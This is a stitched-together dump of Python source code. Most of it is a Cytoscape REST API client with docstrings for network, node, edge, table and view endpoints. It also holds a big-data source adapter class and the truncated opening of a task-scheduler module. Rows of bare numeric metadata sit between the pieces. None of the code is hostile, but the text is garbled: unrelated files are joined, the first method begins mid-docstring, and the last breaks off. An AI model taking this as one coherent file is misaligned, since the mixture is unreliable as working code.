:param tableType: Table Type
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/columns', method="GET", verbose=verbose, parse_params=False)
return response
def getRow(self, networkId, tableType, primaryKey, verbose=None):
"""
Gets a row matching the value specified by the `primaryKey` parameter from the table specified by the `tableType` and `networkId` parameters.
Data is represented by column names and their values.
```json
{
"name": "Hodor 1",
"value": 0.11,
"matched": false
...
}
```
:param networkId: SUID of the network containing the table
:param tableType: Table type
:param primaryKey: Primary key of the row Object, normally an SUID
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/rows/'+str(primaryKey)+'', method="GET", verbose=verbose, parse_params=False)
return response
def getEdgeDirected(self, networkId, edgeId, verbose=None):
"""
Returns true if the edge specified by the `edgeId` and `networkId` parameters is directed.
:param networkId: SUID of the network containing the edge
:param edgeId: SUID of the edge
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges/'+str(edgeId)+'/isDirected', method="GET", verbose=verbose, parse_params=False)
return response
def getNetworkCount(self, verbose=None):
"""
Returns the number of networks in current Cytoscape session.
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/count', method="GET", verbose=verbose, parse_params=False)
return response
def getNetworkView(self, networkId, viewId, file, verbose=None):
"""
Gets the Network View specified by the `viewId` and `networkId` parameters.
If the `file` parameter is left unspecified, the response will contain data in [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json) format.
If the `file` parameter is specified, the Network View will be written to a file, and the response will contain the location of the file in the following format:
```
{
"file": "/media/HD1/myFiles/networkView.sif"
}
```
The format of the output file is defined by the extension of the `file` parameter.
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param file: A path to a file relative to the current directory. The format of the file written is defined by the file extension.
| Extension | Details |
| ----------- | -----------|
| .cys | Cytoscape Style format |
| .xml/.xgmml | [XGMML](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html?highlight=xgmml#xgmml-format) format |
| .nnf | [NNF](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#nnf) format |
| .sif | [SIF](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#sif-format) format |
| .cyjs | [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json) format |
-- Not required, can be None
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'', PARAMS={'file':file}, method="GET", verbose=verbose, parse_params=False)
return response
def putSingleVisualPropertyValueBypass(self, networkId, viewId, objectType, objectId, visualProperty, body, verbose=None):
"""
Bypasses the Visual Style of the object specified by the `objectId` and `objectType` parameters, in the Network View specified by the `viewId` and `networkId` parameters. The Visual Property included in the message body will be used instead of the definition provided by the Visual Style.
Examples of Visual Properties:
```
{
"visualProperty": "NODE_BORDER_WIDTH",
"value": 2
}
```
```
{
"visualProperty": "EDGE_TRANSPARENCY",
"value": 170
}```
```
{
"visualProperty": "NETWORK_BACKGROUND_PAINT",
"value": "#000000"
}```
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: Network SUID
:param viewId: Network View SUID
:param objectType: Type of Object
:param objectId: SUID of the Object
:param visualProperty: Name of the Visual Property
:param body: A Visual Property and its value.
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/'+str(objectType)+'/'+str(objectId)+'/'+str(visualProperty)+'/bypass', method="PUT", body=body, verbose=verbose)
return response
def deleteSingleVisualPropertyValueBypass(self, networkId, viewId, objectType, objectId, visualProperty, verbose=None):
"""
Deletes the bypass Visual Property specified by the `visualProperty` parameter from the object specified by the `objectId` and `objectType` parameters in the Network View Specified by the `viewId` and `networkId` parameters. When this is done, the Visual Property will be defined by the Visual Style
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param objectType: Type of Object
:param objectId: SUID of Object
:param visualProperty: Name of the Visual Property
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/'+str(objectType)+'/'+str(objectId)+'/'+str(visualProperty)+'/bypass', method="DELETE", verbose=verbose)
return response
def getSingleVisualPropertyValueBypass(self, networkId, viewId, objectType, objectId, visualProperty, verbose=None):
"""
Gets the bypass Visual Property specified by the `visualProperty` parameter from the object specified by the `objectId` and `objectType` parameters in the Network View Specified by the `viewId` and `networkId` parameters. The response is the Visual Property that is used in place of the definition provided by the Visual Style.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: Network SUID
:param viewId: Network View SUID
:param objectType: Type of Object
:param objectId: SUID of the Object
:param visualProperty: Name of the Visual Property
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/'+str(objectType)+'/'+str(objectId)+'/'+str(visualProperty)+'/bypass', method="GET", verbose=verbose, parse_params=False)
return response
def deleteNode(self, networkId, nodeId, verbose=None):
"""
Deletes the node specified by the `nodeId` and `networkId` parameters.
:param networkId: SUID of the network containing the node.
:param nodeId: SUID of the node
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/'+str(nodeId)+'', method="DELETE", verbose=verbose)
return response
def getNode(self, networkId, nodeId, verbose=None):
"""
Returns a node with its associated row data.
:param networkId: SUID of the network containing the node
:param nodeId: SUID of the node
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/'+str(nodeId)+'', method="GET", verbose=verbose, parse_params=False)
return response
def createEdge(self, networkId, body, verbose=None):
"""
Add new edge(s) to the network. Body should include an array of new node names.
Returns and array of objects with fields itentifying the SUIDs of the new edges along with source and target SUIDs.
:param networkId: SUID of the network to add edges to.
:param body: Array of new edges
:param verbose: print more
:returns: 200: successful operation
"""
PARAMS=set_param(['networkId','body'],[networkId,body])
response=api(url=self.___url+'networks/'+str(networkId)+'/edges', PARAMS=PARAMS, method="POST", verbose=verbose)
return response
def deleteAllEdges(self, networkId, verbose=None):
"""
Delete all the edges from the network specified by the `networkId` parameter.
:param networkId: SUID of the network to delete edges from
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges', method="DELETE", verbose=verbose)
return response
def getEdges(self, networkId, column, query, verbose=None):
"""
Returns a list of all edges in the network specified by the `networkId` parameter as SUIDs.
If the `column` and `query` parameters are specified, the results will be limited to rows in the edge table where the value in the column specified by the `column` parameter matches the value specified by the `query` parameter.
:param networkId: SUID of the network containing the edges
:param column: The name of the column that will be queried for matches. -- Not required, can be None
:param query: The value to be matched. -- Not required, can be None
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges', PARAMS={'column':column, 'query':query}, method="GET", verbose=verbose, parse_params=False)
return response
def setSelectedEdges(self, networkId, body, verbose=None):
"""
Sets as selected the edges specified by the `suids` and `networkId` parameters.
Returns a list of selected SUIDs.
:param networkId: SUID of the network containing the edges
:param body: Array of edge SUIDs to select -- Not required, can be None
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges/selected', method="PUT", body=body, verbose=verbose)
return response
def getSelectedEdges(self, networkId, verbose=None):
"""
Gets the selected edges in the network specified by the `networkId` parameter. The results are presented as a list of SUIDs.
:param networkId: SUID of the network containing the edges
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges/selected', method="GET", verbose=verbose, parse_params=False)
return response
def getFirstImageAsPng(self, networkId, h, verbose=None):
"""
Returns a PNG image of the first available Network View for the Network specified by the `networkId` parameter.
Default size is 600 px
Example usage:
from IPython.display import Image
fig=cytoscape.networks.getFirstImageAsPng(networkId=cytoscape.network.get()["SUID"],h=None)
with open('my_image.png', 'wb') as file:
file.write(fig.content)
Image(fig.content)
:param networkId: SUID of the Network
:param h: Height of the image. Width is set automatically -- Not required, can be None
:param verbose: print more
:returns: 200: PNG image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/first.png', PARAMS={'h':h}, method="GET", verbose=verbose, parse_params=False)
return response
def getCell(self, networkId, tableType, primaryKey, columnName, verbose=None):
"""
Return the value of a cell specified by the `primaryKey` and `columnName` parameters in the table specified by the `tableType` and `networkId` parameters.
Returns a JSON representation of a String, Boolean, Number, or List.
:param networkId: SUID of the network containing the table
:param tableType: Table type
:param primaryKey: Primary key of the row Object, normally an SUID
:param columnName: Name of the Column
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/rows/'+str(primaryKey)+'/'+str(columnName)+'', method="GET", verbose=verbose, parse_params=False)
return response
def setSelectedNodes(self, networkId, body, verbose=None):
"""
Sets as selected the nodes specified by the `suids` and `networkId` parameters.
Returns a list of selected SUIDs.
:param networkId: SUID of the network containing the nodes
:param body: Array of node SUIDs to select -- Not required, can be None
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/selected', method="PUT", body=body, verbose=verbose)
return response
def getSelectedNodes(self, networkId, verbose=None):
"""
Gets the selected nodes in the network specified by the `networkId` parameter. The results are presented as a list of SUIDs.
:param networkId: SUID of the network containing the nodes
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/selected', method="GET", verbose=verbose, parse_params=False)
return response
def deleteGroup(self, networkId, groupNodeId, verbose=None):
"""
Deletes the group specified by the `groupNodeId` and `networkId` parameters. The nodes and edges that the group contained will remain present in the network, however the node used to identify the Group will be deleted.
:param networkId: SUID of the Network
:param groupNodeId: SUID of the Node representing the Group
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups/'+str(groupNodeId)+'', method="DELETE", verbose=verbose)
return response
def getGroup(self, networkId, groupNodeId, verbose=None):
"""
Returns the group specified by the `groupNodeId` and `networkId` parameters.
:param networkId: SUID of the Network
:param groupNodeId: SUID of the Node representing the Group
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups/'+str(groupNodeId)+'', method="GET", verbose=verbose, parse_params=False)
return response
def getEdgeCount(self, networkId, verbose=None):
"""
Returns the number of edges in the network specified by the `networkId` parameter.
:param networkId: SUID of the network containing the edges
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges/count', method="GET", verbose=verbose, parse_params=False)
return response
def updateColumnValues(self, networkId, tableType, columnName, default, body, verbose=None):
"""
Sets the values for cells in the table specified by the `tableType` and `networkId` parameters.
If the 'default` parameter is not specified, the message body should consist of key-value pairs with which to set values.
If the `default` parameter is specified, its value will be used for every cell in the column. This is useful to set columns like "selected."
:param networkId: SUID of the network containing the table
:param tableType: The type of table
:param columnName: Name of the column in which to set values
:param default: Default Value. If this value is provided, all cells will be set to this. -- Not required, can be None
:param body: Array of SUID Keyed values
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/columns/'+str(columnName)+'', method="PUT", body=body, verbose=verbose)
return response
def deleteColumn(self, networkId, tableType, columnName, verbose=None):
"""
Deletes the column specified by the `columnName` parameter from the table speficied by the `tableType` and `networkId` parameters.
:param networkId: SUID of the network containing the table from which to delete the column
:param tableType: Table Type from which to delete the column
:param columnName: Name of the column to delete
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/columns/'+str(columnName)+'', method="DELETE", verbose=verbose)
return response
def getColumnValues(self, networkId, tableType, columnName, verbose=None):
"""
Returns all the values for the column specified by the `columnType` parameter, in the table specified by the `networkId` and `tableType` parameters.
:param networkId: SUID of the Network
:param tableType: Type of Table
:param columnName: Name of the Column
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/columns/'+str(columnName)+'', method="GET", verbose=verbose, parse_params=False)
return response
def createNode(self, networkId, body, verbose=None):
"""
Adds new nodes to the network specified by the `networkId` parameter. The `name` column will be populated by the contents of the message body.
:param networkId: SUID of the network containing the node.
:param body: Array of new node names
:param verbose: print more
:returns: 201: ; 412:
"""
PARAMS=set_param(['networkId','body'],[networkId,body])
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes', PARAMS=PARAMS, method="POST", verbose=verbose)
return response
def deleteAllNodes(self, networkId, verbose=None):
"""
Delete all the nodes from the network specified by the `networkId` parameter.
:param networkId: SUID of the network to delete nodes from
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes', method="DELETE", verbose=verbose)
return response
def getNodes(self, networkId, column, query, verbose=None):
"""
Returns a list of all nodes in the network specified by the `networkId` parameter as SUIDs.
If the `column` and `query` parameters are specified, the results will be limited to rows in the node table where the value in the column specified by the `column` parameter matches the value specified by the `query` parameter.
:param networkId: SUID of the network containing the nodes
:param column: The name of the column that will be queried for matches. -- Not required, can be None
:param query: The value to be matched. -- Not required, can be None
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes', PARAMS={'column':column, 'query':query}, method="GET", verbose=verbose, parse_params=False)
return response
def setCurrentNetworkView(self, body, verbose=None):
"""
Sets the current Network View.
:param body: SUID of the Network View -- Not required, can be None
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/views/currentNetworkView', method="PUT", body=body, verbose=verbose)
return response
def getCurrentNetworkView(self, verbose=None):
"""
Returns the current Network View.
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/views/currentNetworkView', method="GET", verbose=verbose, parse_params=False)
return response
def getGroupCount(self, networkId, verbose=None):
"""
Returns the number of groups in the network
:param networkId: Network SUID
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups/count', method="GET", verbose=verbose, parse_params=False)
return response
def deleteEdge(self, networkId, edgeId, verbose=None):
"""
Deletes the edge specified by the `edgeId` and `networkId` parameters.
:param networkId: SUID of the network containing the edge.
:param edgeId: SUID of the edge
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges/'+str(edgeId)+'', method="DELETE", verbose=verbose)
return response
def getEdge(self, networkId, edgeId, verbose=None):
"""
Returns an edge with its associated row data.
:param networkId: SUID of the network containing the edge
:param edgeId: SUID of the edge
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges/'+str(edgeId)+'', method="GET", verbose=verbose, parse_params=False)
return response
def getRows(self, networkId, tableType, verbose=None):
"""
Returns all rows from the table specified by `networkId` and `tableType` parameters. Returns a JSON representation of an array of rows.
```
[
{
"SUID": 101,
"gene_name": "brca1",
"exp": 0.1
},
{
"SUID": 102,
"gene_name": "brca2",
"exp": 0.2
}
]
```
:param networkId: SUID of the network containing the table
:param tableType: Table Type
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/tables/'+str(tableType)+'/rows', method="GET", verbose=verbose, parse_params=False)
return response
def getNodeCount(self, networkId, verbose=None):
"""
Returns the number of nodes in the network specified by the `networkId` parameter.
:param networkId: SUID of the network containing the nodes
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/count', method="GET", verbose=verbose, parse_params=False)
return response
def getNeighborsSelected(self, networkId, verbose=None):
"""
Returns the neighbors of the nodes currently selected in the network specified by the `networkId` parameter as a list of SUIDs.
Note that this does not include the nodes in the original selection.
:param networkId: SUID of the network
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/selected/neighbors', method="GET", verbose=verbose, parse_params=False)
return response
def deleteFirstNetworkView(self, networkId, verbose=None):
"""
Deletes the first available Network View for the Network specified by the `networkId` parameter. Cytoscape can have multiple views per network model, but this feature is not exposed in the Cytoscape GUI. GUI access is limited to the first available view only.
:param networkId: SUID of the Network
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/first', method="DELETE", verbose=verbose)
return response
def getFirstNetworkView(self, networkId, file, verbose=None):
"""
This returns the first view of the network. Cytoscape can have multiple views per network model, but this feature is not exposed in the Cytoscape GUI. GUI access is limited to the first available view only.
If the `file` parameter is left unspecified, the response will contain data in [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json) format.
If the `file` parameter is specified, the Network View will be written to a file, and the response will contain the location of the file in the following format:
```
{
"file": "/media/HD1/myFiles/networkView.sif"
}
```
The format of the output file is defined by the extension of the `file` parameter.
:param networkId: SUID of the Network
:param file: A path to a file relative to the current directory. The format of the file written is defined by the file extension.
| Extension | Details |
| ----------- | -----------|
| .cys | Cytoscape Style format |
| .xml/.xgmml | [XGMML](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html?highlight=xgmml#xgmml-format) format |
| .nnf | [NNF](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#nnf) format |
| .sif | [SIF](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#sif-format) format |
| .cyjs | [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json) format |
-- Not required, can be None
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/first', PARAMS={'file':file}, method="GET", verbose=verbose, parse_params=False)
return response
def getAdjEdges(self, networkId, nodeId, verbose=None):
"""
Returns a list of connected edges as SUIDs for the node specified by the `nodeId` and `networkId` parameters.
:param networkId: SUID of the network containing the node
:param nodeId: SUID of the node
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/nodes/'+str(nodeId)+'/adjEdges', method="GET", verbose=verbose, parse_params=False)
return response
def createNetworkView(self, networkId, verbose=None):
"""
Creates a new Network View for the Network specified by the `networkId` parameter.
:param networkId: SUID of the Network
:param verbose: print more
:returns: 201: Network View SUID
"""
PARAMS=set_param(['networkId'],[networkId])
response=api(url=self.___url+'networks/'+str(networkId)+'/views', PARAMS=PARAMS, method="POST", verbose=verbose)
return response
def deleteAllNetworkViews(self, networkId, verbose=None):
"""
Deletes all Network Views available in the Network specified by the `networkId` parameter. Cytoscape can have multiple views per network model, but this feature is not exposed in the Cytoscape GUI. GUI access is limited to the first available view only.
:param networkId: SUID of the Network
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views', method="DELETE", verbose=verbose)
return response
def getAllNetworkViews(self, networkId, verbose=None):
"""
Returns an array of all network views belonging to the network specified by the `networkId` paramter. The response is a list of Network SUIDs.
:param networkId: SUID of the Network
:param verbose: print more
:returns: 200: An array of Network View SUIDs
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views', method="GET", verbose=verbose, parse_params=False)
return response
def getEdgeComponent(self, networkId, edgeId, type, verbose=None):
"""
Returns the SUID of the source or target node of the edge specified by the `edgeId` and `networkId` parameters.
Return values can be in one of two formats, depending on the value specified in the `type` parameter:
```
{
"source": 101
}
```
```
{
"target": 102
}
```
:param networkId: SUID of the network containing the edge
:param edgeId: SUID of the edge
:param type: The node type to return
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/edges/'+str(edgeId)+'/'+str(type)+'', method="GET", verbose=verbose, parse_params=False)
return response
def updateNetworkView(self, networkId, viewId, bypass, body, verbose=None):
"""
Updates the Visual Properties in the Network View specified by the `viewId` and `networkId` parameters.
Example Visual Properties:
```
{
"visualProperty": "NETWORK_BACKGROUND_PAINT",
"value": "#000000"
}```
```
{
"visualProperty": "NETWORK_CENTER_X_LOCATION",
"value": 250
}```
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
Note that this sets the Visual Properties temporarily unless the `bypass` parameter is set to `true`. If the `bypass` parameter is set to `true`, the Visual Style will be overridden by these Visual Property values. If the `bypass` parameter is not used or is set to `false`, any Visual Properties set will return to those defined in the Visual Style if the Network View is updated.
:param networkId: Network SUID
:param viewId: Network View SUID
:param bypass: Bypass the Visual Style with these properties -- Not required, can be None
:param body: A list of Visual Properties and their values.
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/network', method="PUT", body=body, verbose=verbose)
return response
def getNetworkVisualProps(self, networkId, viewId, verbose=None):
"""
Returns a list of the Visual Properties for the Network View specified by the `viewId` and `networkId` parameters.
Additional details on common Visual Properties can be found in the [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'/network', method="GET", verbose=verbose, parse_params=False)
return response
def createGroup(self, networkId, body, verbose=None):
"""
Create a new group in the network specified by the parameter `networkId`. The contents are specified the message body.
:param networkId: SUID of the Network
:param body: New Group name and contents
:param verbose: print more
:returns: 200: successful operation
"""
PARAMS=set_param(['networkId','body'],[networkId,body])
response=api(url=self.___url+'networks/'+str(networkId)+'/groups', PARAMS=PARAMS, method="POST", verbose=verbose)
return response
def deleteAllGroups(self, networkId, verbose=None):
"""
Deletes all groups in the network specified by `networkId` parameter. The nodes and edges that the groups contained will remain present in the network, however the nodes used to identify the Groups will be deleted.
:param networkId: SUID of the Network
:param verbose: print more
:returns: default: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups', method="DELETE", verbose=verbose)
return response
def getAllGroups(self, networkId, verbose=None):
"""
Returns a list of all the groups in the network specified by the `networkId` parameter.
:param networkId: Network SUID
:param verbose: print more
:returns: 200: successful operation
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/groups', method="GET", verbose=verbose, parse_params=False)
return response
def getImageAsSvg(self, networkId, viewId, h, verbose=None):
"""
Returns an SVG image of the Network View specified by the `viewId` and `networkId` parameters.
Default size is 600 px.
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param h: Height of the image. Width is set automatically -- Not required, can be None
:param verbose: print more
:returns: 200: SVG image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'.svg', PARAMS={'h':h}, method="GET", verbose=verbose, parse_params=False)
return response
def getImageAsPng(self, networkId, viewId, h, verbose=None):
"""
Returns a PNG image of the Network View specified by the `viewId` and `networkId` parameters.
Default size is 600 px.
:param networkId: SUID of the Network
:param viewId: SUID of the Network View
:param h: Height of the image. Width is set automatically -- Not required, can be None
:param verbose: print more
:returns: 200: PNG image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/'+str(viewId)+'.png', PARAMS={'h':h}, method="GET", verbose=verbose, parse_params=False)
return response
def getFirstImageAsSvg(self, networkId, h, verbose=None):
"""
Returns an SVG image of the first available Network View for the Network specified by the `networkId` parameter.
Default size is 600 px
:param networkId: SUID of the Network
:param h: Height of the image. Width is set automatically -- Not required, can be None
:param verbose: print more
:returns: 200: SVG image stream.
"""
response=api(url=self.___url+'networks/'+str(networkId)+'/views/first.svg', PARAMS={'h':h}, method="GET", verbose=verbose, parse_params=False)
return response
| 40.762224
| 389
| 0.658582
| 7,321
| 60,858
| 5.424532
| 0.060238
| 0.020145
| 0.024476
| 0.035051
| 0.87664
| 0.854103
| 0.824944
| 0.789741
| 0.772241
| 0.730617
| 0
| 0.006822
| 0.241332
| 60,858
| 1,492
| 390
| 40.789544
| 0.853306
| 0.559318
| 0
| 0.330677
| 0
| 0
| 0.102582
| 0.006699
| 0
| 0
| 0
| 0
| 0
| 1
| 0.322709
| false
| 0.055777
| 0.003984
| 0
| 0.649402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
91742e29031a9a152eb085356856b78ba9fca01a
| 3,193
|
py
|
Python
|
pdip/integrator/connection/types/bigdata/adapters/source/big_data_source_adapter.py
|
ahmetcagriakca/pdip
|
c4c16d5666a740154cabdc6762cd44d98b7bdde8
|
[
"MIT"
] | 2
|
2021-12-09T21:07:46.000Z
|
2021-12-11T22:18:01.000Z
|
pdip/integrator/connection/types/bigdata/adapters/source/big_data_source_adapter.py
|
PythonDataIntegrator/pdip
|
c4c16d5666a740154cabdc6762cd44d98b7bdde8
|
[
"MIT"
] | null | null | null |
pdip/integrator/connection/types/bigdata/adapters/source/big_data_source_adapter.py
|
PythonDataIntegrator/pdip
|
c4c16d5666a740154cabdc6762cd44d98b7bdde8
|
[
"MIT"
] | 3
|
2021-11-15T00:47:00.000Z
|
2021-12-17T11:35:45.000Z
|
from typing import List
from injector import inject
from pdip.integrator.connection.base import ConnectionSourceAdapter
from pdip.integrator.connection.types.bigdata.base import BigDataProvider
from pdip.integrator.integration.domain.base import IntegrationBase
class BigDataSourceAdapter(ConnectionSourceAdapter):
@inject
def __init__(self,
provider: BigDataProvider,
):
self.provider = provider
def get_source_data_count(self, integration: IntegrationBase) -> int:
source_context = self.provider.get_context_by_config(
config=integration.SourceConnections.BigData.Connection)
query = integration.SourceConnections.BigData.Query
if integration.SourceConnections.BigData.Query is None or integration.SourceConnections.BigData.Query == '':
schema = integration.SourceConnections.BigData.Schema
table = integration.SourceConnections.BigData.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Source Schema and Table required. {schema}.{table}")
query = source_context.dialect.get_table_select_query(selected_rows='*', schema=schema, table=table)
data_count = source_context.get_table_count(query=query)
return data_count
def get_source_data(self, integration: IntegrationBase) -> List[any]:
source_context = self.provider.get_context_by_config(
config=integration.SourceConnections.BigData.Connection)
query = integration.SourceConnections.BigData.Query
if integration.SourceConnections.BigData.Query is None or integration.SourceConnections.BigData.Query == '':
schema = integration.SourceConnections.BigData.Schema
table = integration.SourceConnections.BigData.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Source Schema and Table required. {schema}.{table}")
query = source_context.dialect.get_table_select_query(selected_rows='*', schema=schema, table=table)
data = source_context.get_table_data(query=query)
return data
def get_source_data_with_paging(self, integration: IntegrationBase, start, end) -> List[any]:
source_context = self.provider.get_context_by_config(
config=integration.SourceConnections.BigData.Connection)
query = integration.SourceConnections.BigData.Query
if integration.SourceConnections.BigData.Query is None or integration.SourceConnections.BigData.Query == '':
schema = integration.SourceConnections.BigData.Schema
table = integration.SourceConnections.BigData.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Source Schema and Table required. {schema}.{table}")
query = source_context.dialect.get_table_select_query(selected_rows='*', schema=schema, table=table)
data = source_context.get_table_data_with_paging(
query=query,
start=start,
end=end
)
return data
| 54.118644
| 116
| 0.705606
| 341
| 3,193
| 6.451613
| 0.16129
| 0.229091
| 0.286364
| 0.163636
| 0.716364
| 0.716364
| 0.716364
| 0.716364
| 0.716364
| 0.716364
| 0
| 0
| 0.212339
| 3,193
| 58
| 117
| 55.051724
| 0.874751
| 0
| 0
| 0.568627
| 0
| 0
| 0.047917
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.098039
| 0
| 0.254902
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
919ed8f0ad1d905cb001d29c8ec96e6e35189fc9
| 38,660
|
py
|
Python
|
code/jobscheduling/schedulers/BlockPBEDF.py
|
mdskrzypczyk/LinkScheduling
|
46b4a676976f3429f6b5a28685386ed712f1bbe0
|
[
"MIT"
] | null | null | null |
code/jobscheduling/schedulers/BlockPBEDF.py
|
mdskrzypczyk/LinkScheduling
|
46b4a676976f3429f6b5a28685386ed712f1bbe0
|
[
"MIT"
] | null | null | null |
code/jobscheduling/schedulers/BlockPBEDF.py
|
mdskrzypczyk/LinkScheduling
|
46b4a676976f3429f6b5a28685386ed712f1bbe0
|
[
"MIT"
] | null | null | null |
from queue import PriorityQueue
from jobscheduling.log import LSLogger
from jobscheduling.schedulers.scheduler import Scheduler, verify_budget_schedule
from jobscheduling.task import get_lcm_for
logger = LSLogger()
class UniResourcePreemptionBudgetScheduler(Scheduler):
def schedule_tasks(self, taskset, topology=None):
"""
Main scheduling function for uniprocessor EDF-LBF
